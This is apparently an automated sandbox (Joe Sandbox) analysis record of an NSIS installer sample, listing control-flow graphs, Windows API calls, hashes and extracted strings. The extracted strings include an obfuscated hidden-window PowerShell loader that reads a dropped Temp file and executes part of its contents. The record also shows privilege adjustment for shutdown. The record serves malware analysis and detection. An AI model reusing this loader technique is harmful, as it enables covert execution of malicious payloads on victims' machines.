3363->3364 3364->3362 4220 40488f GetDlgItem GetDlgItem 4221 4048e1 7 API calls 4220->4221 4230 404af9 4220->4230 4222 404984 DeleteObject 4221->4222 4223 404977 SendMessageA 4221->4223 4224 40498d 4222->4224 4223->4222 4225 4049c4 4224->4225 4229 405d1b 18 API calls 4224->4229 4226 403ede 19 API calls 4225->4226 4231 4049d8 4226->4231 4227 404c89 4232 404c93 SendMessageA 4227->4232 4233 404c9b 4227->4233 4228 404bdd 4228->4227 4237 404c36 SendMessageA 4228->4237 4263 404aec 4228->4263 4234 4049a6 SendMessageA SendMessageA 4229->4234 4230->4228 4235 4047dd 5 API calls 4230->4235 4252 404b6a 4230->4252 4236 403ede 19 API calls 4231->4236 4232->4233 4240 404cb4 4233->4240 4241 404cad ImageList_Destroy 4233->4241 4254 404cc4 4233->4254 4234->4224 4235->4252 4253 4049e6 4236->4253 4243 404c4b SendMessageA 4237->4243 4237->4263 4238 403f45 8 API calls 4244 404e7f 4238->4244 4239 404bcf SendMessageA 4239->4228 4245 404cbd GlobalFree 4240->4245 4240->4254 4241->4240 4242 404e33 4248 404e45 ShowWindow GetDlgItem ShowWindow 4242->4248 4242->4263 4247 404c5e 4243->4247 4245->4254 4246 404aba GetWindowLongA SetWindowLongA 4249 404ad3 4246->4249 4258 404c6f SendMessageA 4247->4258 4248->4263 4250 404af1 4249->4250 4251 404ad9 ShowWindow 4249->4251 4272 403f13 SendMessageA 4250->4272 4271 403f13 SendMessageA 4251->4271 4252->4228 4252->4239 4253->4246 4257 404a35 SendMessageA 4253->4257 4259 404ab4 4253->4259 4260 404a71 SendMessageA 4253->4260 4261 404a82 SendMessageA 4253->4261 4254->4242 4262 40485d 4 API calls 4254->4262 4267 404cff 4254->4267 4257->4253 4258->4227 4259->4246 4259->4249 4260->4253 4261->4253 4262->4267 4263->4238 4264 404e09 InvalidateRect 4264->4242 4265 404e1f 4264->4265 4273 404798 4265->4273 4266 404d2d SendMessageA 4270 404d43 4266->4270 4267->4266 4267->4270 4269 404db7 SendMessageA SendMessageA 4269->4270 4270->4264 4270->4269 4271->4263 4272->4230 4276 4046d3 4273->4276 4275 4047ad 4275->4242 4277 4046e9 4276->4277 4278 405d1b 18 API calls 
4277->4278 4279 40474d 4278->4279 4280 405d1b 18 API calls 4279->4280 4281 404758 4280->4281 4282 405d1b 18 API calls 4281->4282 4283 40476e lstrlenA wsprintfA SetDlgItemTextA 4282->4283 4283->4275 3420 401f90 3421 401fa2 3420->3421 3422 402050 3420->3422 3423 402a3a 18 API calls 3421->3423 3425 401423 25 API calls 3422->3425 3424 401fa9 3423->3424 3426 402a3a 18 API calls 3424->3426 3427 4021c9 3425->3427 3428 401fb2 3426->3428 3429 401fc7 LoadLibraryExA 3428->3429 3430 401fba GetModuleHandleA 3428->3430 3429->3422 3431 401fd7 GetProcAddress 3429->3431 3430->3429 3430->3431 3432 402023 3431->3432 3433 401fe6 3431->3433 3434 404f12 25 API calls 3432->3434 3436 401ff6 3433->3436 3438 401423 3433->3438 3434->3436 3436->3427 3437 402044 FreeLibrary 3436->3437 3437->3427 3439 404f12 25 API calls 3438->3439 3440 401431 3439->3440 3440->3436 3441 402410 3442 402b44 19 API calls 3441->3442 3443 40241a 3442->3443 3444 402a3a 18 API calls 3443->3444 3445 402423 3444->3445 3446 40242d RegQueryValueExA 3445->3446 3450 4026a6 3445->3450 3447 402453 RegCloseKey 3446->3447 3448 40244d 3446->3448 3447->3450 3448->3447 3452 405c57 wsprintfA 3448->3452 3452->3447 4284 401490 4285 404f12 25 API calls 4284->4285 4286 401497 4285->4286 4287 406690 4291 4061c8 4287->4291 4288 406b33 4289 406252 GlobalAlloc 4289->4288 4289->4291 4290 406249 GlobalFree 4290->4289 4291->4288 4291->4289 4291->4290 4291->4291 4292 4062c0 GlobalFree 4291->4292 4293 4062c9 GlobalAlloc 4291->4293 4292->4293 4293->4288 4293->4291 4294 401595 4295 402a3a 18 API calls 4294->4295 4296 40159c SetFileAttributesA 4295->4296 4297 4015ae 4296->4297 4298 402616 4299 40261d 4298->4299 4302 40287c 4298->4302 4300 402a1d 18 API calls 4299->4300 4301 402628 4300->4301 4303 40262f SetFilePointer 4301->4303 4303->4302 4304 40263f 4303->4304 4306 405c57 wsprintfA 4304->4306 4306->4302 3557 401717 3558 402a3a 18 API calls 3557->3558 3559 40171e SearchPathA 3558->3559 3560 401739 3559->3560 4307 402519 4308 40252e 4307->4308 
4309 40251e 4307->4309 4311 402a3a 18 API calls 4308->4311 4310 402a1d 18 API calls 4309->4310 4312 402527 4310->4312 4313 402535 lstrlenA 4311->4313 4314 405a13 WriteFile 4312->4314 4315 402557 4312->4315 4313->4312 4314->4315 4316 40431c 4317 404348 4316->4317 4318 404359 4316->4318 4377 4054d3 GetDlgItemTextA 4317->4377 4320 404365 GetDlgItem 4318->4320 4327 4043c4 4318->4327 4325 404379 4320->4325 4321 404353 4322 405f64 5 API calls 4321->4322 4322->4318 4323 4044a8 4326 404652 4323->4326 4379 4054d3 GetDlgItemTextA 4323->4379 4324 40438d SetWindowTextA 4329 403ede 19 API calls 4324->4329 4325->4324 4333 405804 4 API calls 4325->4333 4332 403f45 8 API calls 4326->4332 4327->4323 4327->4326 4330 405d1b 18 API calls 4327->4330 4334 4043a9 4329->4334 4335 404438 SHBrowseForFolderA 4330->4335 4331 4044d8 4336 405859 18 API calls 4331->4336 4337 404666 4332->4337 4338 404383 4333->4338 4339 403ede 19 API calls 4334->4339 4335->4323 4340 404450 CoTaskMemFree 4335->4340 4341 4044de 4336->4341 4338->4324 4344 40576b 3 API calls 4338->4344 4342 4043b7 4339->4342 4343 40576b 3 API calls 4340->4343 4380 405cf9 lstrcpynA 4341->4380 4378 403f13 SendMessageA 4342->4378 4346 40445d 4343->4346 4344->4324 4349 404494 SetDlgItemTextA 4346->4349 4353 405d1b 18 API calls 4346->4353 4348 4043bd 4351 406092 5 API calls 4348->4351 4349->4323 4350 4044f5 4352 406092 5 API calls 4350->4352 4351->4327 4360 4044fc 4352->4360 4354 40447c lstrcmpiA 4353->4354 4354->4349 4357 40448d lstrcatA 4354->4357 4355 404538 4381 405cf9 lstrcpynA 4355->4381 4357->4349 4358 40453f 4359 405804 4 API calls 4358->4359 4361 404545 GetDiskFreeSpaceA 4359->4361 4360->4355 4363 4057b2 2 API calls 4360->4363 4365 404590 4360->4365 4364 404569 MulDiv 4361->4364 4361->4365 4363->4360 4364->4365 4366 404601 4365->4366 4367 404798 21 API calls 4365->4367 4368 404624 4366->4368 4370 40140b 2 API calls 4366->4370 4369 4045ee 4367->4369 4382 403f00 KiUserCallbackDispatcher 4368->4382 4372 404603 SetDlgItemTextA 
4369->4372 4373 4045f3 4369->4373 4370->4368 4372->4366 4375 4046d3 21 API calls 4373->4375 4374 404640 4374->4326 4383 4042b1 4374->4383 4375->4366 4377->4321 4378->4348 4379->4331 4380->4350 4381->4358 4382->4374 4384 4042c4 SendMessageA 4383->4384 4385 4042bf 4383->4385 4384->4326 4385->4384 4386 40149d 4387 4014ab PostQuitMessage 4386->4387 4388 40226e 4386->4388 4387->4388 2986 401b23 2987 401b30 2986->2987 2988 401b74 2986->2988 2989 401bb8 2987->2989 2994 401b47 2987->2994 2990 401b78 2988->2990 2991 401b9d GlobalAlloc 2988->2991 2993 405d1b 18 API calls 2989->2993 2999 40226e 2989->2999 2990->2999 3025 405cf9 lstrcpynA 2990->3025 3005 405d1b 2991->3005 2995 402268 2993->2995 3023 405cf9 lstrcpynA 2994->3023 3026 4054ef 2995->3026 2997 401b8a GlobalFree 2997->2999 3000 401b56 3024 405cf9 lstrcpynA 3000->3024 3003 401b65 3030 405cf9 lstrcpynA 3003->3030 3022 405d28 3005->3022 3006 405f4b 3007 405f60 3006->3007 3047 405cf9 lstrcpynA 3006->3047 3007->2989 3009 405dc9 GetVersion 3009->3022 3010 405f22 lstrlenA 3010->3022 3012 405d1b 10 API calls 3012->3010 3015 405e41 GetSystemDirectoryA 3015->3022 3016 405e54 GetWindowsDirectoryA 3016->3022 3018 405d1b 10 API calls 3018->3022 3019 405ecb lstrcatA 3019->3022 3020 405e88 SHGetSpecialFolderLocation 3021 405ea0 SHGetPathFromIDListA CoTaskMemFree 3020->3021 3020->3022 3021->3022 3022->3006 3022->3009 3022->3010 3022->3012 3022->3015 3022->3016 3022->3018 3022->3019 3022->3020 3031 405be0 RegOpenKeyExA 3022->3031 3036 405f64 3022->3036 3045 405c57 wsprintfA 3022->3045 3046 405cf9 lstrcpynA 3022->3046 3023->3000 3024->3003 3025->2997 3028 405504 3026->3028 3027 405550 3027->2999 3028->3027 3029 405518 MessageBoxIndirectA 3028->3029 3029->3027 3030->2999 3032 405c51 3031->3032 3033 405c13 RegQueryValueExA 3031->3033 3032->3022 3034 405c34 RegCloseKey 3033->3034 3034->3032 3037 405f70 3036->3037 3039 405fcd CharNextA 3037->3039 3040 405fd8 3037->3040 3043 405fbb CharNextA 3037->3043 3044 405fc8 CharNextA 3037->3044 3048 
405796 3037->3048 3038 405fdc CharPrevA 3038->3040 3039->3037 3039->3040 3040->3038 3041 405ff7 3040->3041 3041->3022 3043->3037 3044->3039 3045->3022 3046->3022 3047->3007 3049 40579c 3048->3049 3050 4057af 3049->3050 3051 4057a2 CharNextA 3049->3051 3050->3037 3051->3049 4389 404027 4390 40403d 4389->4390 4395 404149 4389->4395 4393 403ede 19 API calls 4390->4393 4391 4041b8 4392 40428c 4391->4392 4394 4041c2 GetDlgItem 4391->4394 4398 403f45 8 API calls 4392->4398 4396 404093 4393->4396 4400 4041d8 4394->4400 4401 40424a 4394->4401 4395->4391 4395->4392 4397 40418d GetDlgItem SendMessageA 4395->4397 4399 403ede 19 API calls 4396->4399 4420 403f00 KiUserCallbackDispatcher 4397->4420 4403 404287 4398->4403 4404 4040a0 CheckDlgButton 4399->4404 4400->4401 4405 4041fe 6 API calls 4400->4405 4401->4392 4406 40425c 4401->4406 4418 403f00 KiUserCallbackDispatcher 4404->4418 4405->4401 4409 404262 SendMessageA 4406->4409 4410 404273 4406->4410 4407 4041b3 4412 4042b1 SendMessageA 4407->4412 4409->4410 4410->4403 4411 404279 SendMessageA 4410->4411 4411->4403 4412->4391 4413 4040be GetDlgItem 4419 403f13 SendMessageA 4413->4419 4415 4040d4 SendMessageA 4416 4040f2 GetSysColor 4415->4416 4417 4040fb SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4415->4417 4416->4417 4417->4403 4418->4413 4419->4415 4420->4407 4421 401ca7 4422 402a1d 18 API calls 4421->4422 4423 401cae 4422->4423 4424 402a1d 18 API calls 4423->4424 4425 401cb6 GetDlgItem 4424->4425 4426 402513 4425->4426 4426->4426 3129 40192a 3130 40192c 3129->3130 3131 402a3a 18 API calls 3130->3131 3132 401931 3131->3132 3135 40559b 3132->3135 3176 405859 3135->3176 3138 4055c3 DeleteFileA 3143 40193a 3138->3143 3139 405712 3139->3143 3208 405ffd FindFirstFileA 3139->3208 3140 4055da 3140->3139 3190 405cf9 lstrcpynA 3140->3190 3142 405600 3144 405613 3142->3144 3145 405606 lstrcatA 3142->3145 3191 4057b2 lstrlenA 3144->3191 3148 405619 3145->3148 3149 405627 lstrcatA 3148->3149 3150 40561e 3148->3150 3152 
405632 lstrlenA FindFirstFileA 3149->3152 3150->3149 3150->3152 3154 405708 3152->3154 3174 405656 3152->3174 3153 405730 3211 40576b lstrlenA CharPrevA 3153->3211 3154->3139 3156 405796 CharNextA 3156->3174 3158 405553 5 API calls 3159 405742 3158->3159 3160 405746 3159->3160 3161 40575c 3159->3161 3160->3143 3165 404f12 25 API calls 3160->3165 3162 404f12 25 API calls 3161->3162 3162->3143 3163 4056e7 FindNextFileA 3166 4056ff FindClose 3163->3166 3163->3174 3167 405753 3165->3167 3166->3154 3168 405bb4 38 API calls 3167->3168 3171 40575a 3168->3171 3170 40559b 62 API calls 3170->3174 3171->3143 3172 404f12 25 API calls 3172->3163 3173 404f12 25 API calls 3173->3174 3174->3156 3174->3163 3174->3170 3174->3172 3174->3173 3195 405cf9 lstrcpynA 3174->3195 3196 405553 3174->3196 3204 405bb4 MoveFileExA 3174->3204 3214 405cf9 lstrcpynA 3176->3214 3178 40586a 3215 405804 CharNextA CharNextA 3178->3215 3181 4055bb 3181->3138 3181->3140 3182 405f64 5 API calls 3188 405880 3182->3188 3183 4058ab lstrlenA 3184 4058b6 3183->3184 3183->3188 3185 40576b 3 API calls 3184->3185 3187 4058bb GetFileAttributesA 3185->3187 3186 405ffd 2 API calls 3186->3188 3187->3181 3188->3181 3188->3183 3188->3186 3189 4057b2 2 API calls 3188->3189 3189->3183 3190->3142 3192 4057bf 3191->3192 3193 4057d0 3192->3193 3194 4057c4 CharPrevA 3192->3194 3193->3148 3194->3192 3194->3193 3195->3174 3221 405947 GetFileAttributesA 3196->3221 3199 405580 3199->3174 3200 405576 DeleteFileA 3202 40557c 3200->3202 3201 40556e RemoveDirectoryA 3201->3202 3202->3199 3203 40558c SetFileAttributesA 3202->3203 3203->3199 3205 405bd5 3204->3205 3206 405bc8 3204->3206 3205->3174 3224 405a42 lstrcpyA 3206->3224 3209 406013 FindClose 3208->3209 3210 40572c 3208->3210 3209->3210 3210->3143 3210->3153 3212 405736 3211->3212 3213 405785 lstrcatA 3211->3213 3212->3158 3213->3212 3214->3178 3216 40581f 3215->3216 3219 40582f 3215->3219 3217 40582a CharNextA 3216->3217 3216->3219 3220 40584f 3217->3220 3218 405796 CharNextA 
3218->3219 3219->3218 3219->3220 3220->3181 3220->3182 3222 40555f 3221->3222 3223 405959 SetFileAttributesA 3221->3223 3222->3199 3222->3200 3222->3201 3223->3222 3225 405a90 GetShortPathNameA 3224->3225 3226 405a6a 3224->3226 3228 405aa5 3225->3228 3229 405baf 3225->3229 3251 40596c GetFileAttributesA CreateFileA 3226->3251 3228->3229 3231 405aad wsprintfA 3228->3231 3229->3205 3230 405a74 CloseHandle GetShortPathNameA 3230->3229 3232 405a88 3230->3232 3233 405d1b 18 API calls 3231->3233 3232->3225 3232->3229 3234 405ad5 3233->3234 3252 40596c GetFileAttributesA CreateFileA 3234->3252 3236 405ae2 3236->3229 3237 405af1 GetFileSize GlobalAlloc 3236->3237 3238 405b13 3237->3238 3239 405ba8 CloseHandle 3237->3239 3253 4059e4 ReadFile 3238->3253 3239->3229 3244 405b32 lstrcpyA 3246 405b54 3244->3246 3245 405b46 3247 4058d1 4 API calls 3245->3247 3248 405b8b SetFilePointer 3246->3248 3247->3246 3260 405a13 WriteFile 3248->3260 3251->3230 3252->3236 3254 405a02 3253->3254 3254->3239 3255 4058d1 lstrlenA 3254->3255 3256 405912 lstrlenA 3255->3256 3257 40591a 3256->3257 3258 4058eb lstrcmpiA 3256->3258 3257->3244 3257->3245 3258->3257 3259 405909 CharNextA 3258->3259 3259->3256 3261 405a31 GlobalFree 3260->3261 3261->3239 4434 4028aa SendMessageA 4435 4028c4 InvalidateRect 4434->4435 4436 4028cf 4434->4436 4435->4436 3526 4015b3 3527 402a3a 18 API calls 3526->3527 3528 4015ba 3527->3528 3529 405804 4 API calls 3528->3529 3541 4015c2 3529->3541 3530 40161c 3532 401621 3530->3532 3533 40164a 3530->3533 3531 405796 CharNextA 3531->3541 3534 401423 25 API calls 3532->3534 3535 401423 25 API calls 3533->3535 3536 401628 3534->3536 3542 401642 3535->3542 3553 405cf9 lstrcpynA 3536->3553 3540 401633 SetCurrentDirectoryA 3540->3542 3541->3530 3541->3531 3543 401604 GetFileAttributesA 3541->3543 3545 405472 3541->3545 3548 4053d8 CreateDirectoryA 3541->3548 3554 405455 CreateDirectoryA 3541->3554 3543->3541 3546 406092 5 API calls 3545->3546 3547 405479 3546->3547 3547->3541 3549 
405425 3548->3549 3550 405429 GetLastError 3548->3550 3549->3541 3550->3549 3551 405438 SetFileSecurityA 3550->3551 3551->3549 3552 40544e GetLastError 3551->3552 3552->3549 3553->3540 3555 405465 3554->3555 3556 405469 GetLastError 3554->3556 3555->3541 3556->3555 4437 4016b3 4438 402a3a 18 API calls 4437->4438 4439 4016b9 GetFullPathNameA 4438->4439 4440 4016d0 4439->4440 4441 4016f1 4439->4441 4440->4441 4444 405ffd 2 API calls 4440->4444 4442 401705 GetShortPathNameA 4441->4442 4443 4028cf 4441->4443 4442->4443 4445 4016e1 4444->4445 4445->4441 4447 405cf9 lstrcpynA 4445->4447 4447->4441 4448 403637 4449 403642 4448->4449 4450 403646 4449->4450 4451 403649 GlobalAlloc 4449->4451 4451->4450 4459 4014b7 4460 4014bd 4459->4460 4461 401389 2 API calls 4460->4461 4462 4014c5 4461->4462 4463 401d38 GetDC GetDeviceCaps 4464 402a1d 18 API calls 4463->4464 4465 401d56 MulDiv ReleaseDC 4464->4465 4466 402a1d 18 API calls 4465->4466 4467 401d75 4466->4467 4468 405d1b 18 API calls 4467->4468 4469 401dae CreateFontIndirectA 4468->4469 4470 402513 4469->4470 3816 40173e 3817 402a3a 18 API calls 3816->3817 3818 401745 3817->3818 3819 40599b 2 API calls 3818->3819 3820 40174c 3819->3820 3821 40599b 2 API calls 3820->3821 3821->3820 4471 401ebe 4472 402a3a 18 API calls 4471->4472 4473 401ec5 4472->4473 4474 405ffd 2 API calls 4473->4474 4475 401ecb 4474->4475 4477 401edd 4475->4477 4478 405c57 wsprintfA 4475->4478 4478->4477 4479 40193f 4480 402a3a 18 API calls 4479->4480 4481 401946 lstrlenA 4480->4481 4482 402513 4481->4482

                                      Control-flow Graph
                                      [Control-flow graph for the function starting at 004030D9 (legend: executed / not executed basic blocks); basic-block edge list not reproduced as text]
                                      APIs
                                      • SetErrorMode.KERNELBASE ref: 004030FE
                                      • GetVersion.KERNEL32 ref: 00403104
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040312D
                                      • #17.COMCTL32(00000007,00000009), ref: 0040314F
                                      • OleInitialize.OLE32(00000000), ref: 00403156
                                      • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000), ref: 00403172
                                      • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403187
                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\anziOUzZJs.exe",00000000), ref: 0040319A
                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\anziOUzZJs.exe",00000020), ref: 004031C5
                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 004032C2
                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004032D3
                                      • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004032DF
                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004032F3
                                      • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004032FB
                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040330C
                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403314
                                      • DeleteFileA.KERNELBASE(1033), ref: 00403328
                                        • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
                                        • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                      • OleUninitialize.OLE32(?), ref: 004033D6
                                      • ExitProcess.KERNEL32 ref: 004033F7
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403514
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040351B
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403533
                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403552
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403576
                                      • ExitProcess.KERNEL32 ref: 00403599
                                        • Part of subcall function 004054EF: MessageBoxIndirectA.USER32(00409218), ref: 0040554A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                      • String ID: "$"C:\Users\user\Desktop\anziOUzZJs.exe"$"powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$C:\Users\user\Desktop$C:\Users\user\Desktop\anziOUzZJs.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 3329125770-3344835159
                                      • Opcode ID: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
                                      • Instruction ID: e7c85c4fe1f62676e3f8a08d8ca43f8bf3783ba147aef7bb7f1979754dcbcc24
                                      • Opcode Fuzzy Hash: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
                                      • Instruction Fuzzy Hash: B7C1E5706083417AE711AF71AD8DA2B7EA8EB85306F04457FF541B61D2C77C5A05CB2E

                                      Control-flow Graph (rendered graph not reproduced here; first basic block 405050-40506c)
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 004050AF
                                      • GetDlgItem.USER32(?,000003EE), ref: 004050BE
                                      • GetClientRect.USER32(?,?), ref: 004050FB
                                      • GetSystemMetrics.USER32(00000002), ref: 00405102
                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405123
                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405134
                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405147
                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405155
                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405168
                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040518A
                                      • ShowWindow.USER32(?,00000008), ref: 0040519E
                                      • GetDlgItem.USER32(?,000003EC), ref: 004051BF
                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051CF
                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051E8
                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004051F4
                                      • GetDlgItem.USER32(?,000003F8), ref: 004050CD
                                        • Part of subcall function 00403F13: SendMessageA.USER32(00000028,?,00000001,00403D44), ref: 00403F21
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405210
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00004FE4,00000000), ref: 0040521E
                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405225
                                      • ShowWindow.USER32(00000000), ref: 00405248
                                      • ShowWindow.USER32(?,00000008), ref: 0040524F
                                      • ShowWindow.USER32(00000008), ref: 00405295
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052C9
                                      • CreatePopupMenu.USER32 ref: 004052DA
                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004052EF
                                      • GetWindowRect.USER32(?,000000FF), ref: 0040530F
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405328
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405364
                                      • OpenClipboard.USER32(00000000), ref: 00405374
                                      • EmptyClipboard.USER32 ref: 0040537A
                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405383
                                      • GlobalLock.KERNEL32(00000000), ref: 0040538D
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053A1
                                      • GlobalUnlock.KERNEL32(00000000), ref: 004053BA
                                      • SetClipboardData.USER32(00000001,00000000), ref: 004053C5
                                      • CloseClipboard.USER32 ref: 004053CB
                                      Strings
                                      • Concrescences Setup: Completed, xrefs: 00405340
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                      • String ID: Concrescences Setup: Completed
                                      • API String ID: 4154960007-732904307
                                      • Opcode ID: 2f7611a0bce828b228995c06d13905ff2deeaa3c0883401f0d5d6c5519410eed
                                      • Instruction ID: 36ba5585b1d224b9782629df23ee11add298fe1a6f2e37662bad4ed6ffe984ff
                                      • Opcode Fuzzy Hash: 2f7611a0bce828b228995c06d13905ff2deeaa3c0883401f0d5d6c5519410eed
                                      • Instruction Fuzzy Hash: 46A159B1900208BFDB119FA0DD85AAE7F79FB48355F10407AFA01B61A0C7B55E41DF69

                                      Control-flow Graph (rendered graph not reproduced here; first basic block 405d1b-405d26)
                                      APIs
                                      • GetVersion.KERNEL32(?,sportspladsers,00000000,00404F4A,sportspladsers,00000000), ref: 00405DCC
                                      • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E47
                                      • GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E5A
                                      • SHGetSpecialFolderLocation.SHELL32(?,0040E8C0), ref: 00405E96
                                      • SHGetPathFromIDListA.SHELL32(0040E8C0,: Completed), ref: 00405EA4
                                      • CoTaskMemFree.OLE32(0040E8C0), ref: 00405EAF
                                      • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED1
                                      • lstrlenA.KERNEL32(: Completed,?,sportspladsers,00000000,00404F4A,sportspladsers,00000000), ref: 00405F23
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                      • String ID: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$sportspladsers
                                      • API String ID: 900638850-1033670284
                                      • Opcode ID: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
                                      • Instruction ID: 70d043a0125fa0970afc212ad974551980140434863585fcf13b89b4fbf53fe2
                                      • Opcode Fuzzy Hash: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
                                      • Instruction Fuzzy Hash: AD61F471A04A01ABDF205F64DC88B7F3BA8DB41305F50803BE941B62D0D27D4A82DF5E

                                      Control-flow Graph (rendered graph not reproduced here; first basic block 40559b-4055c1)
                                      APIs
                                      • DeleteFileA.KERNELBASE(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004055C4
                                      • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040560C
                                      • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040562D
                                      • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405633
                                      • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405644
                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F1
                                      • FindClose.KERNEL32(00000000), ref: 00405702
                                      Strings
                                      • "C:\Users\user\Desktop\anziOUzZJs.exe", xrefs: 0040559B
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004055A8
                                      • \*.*, xrefs: 00405606
                                      Memory Dump Source
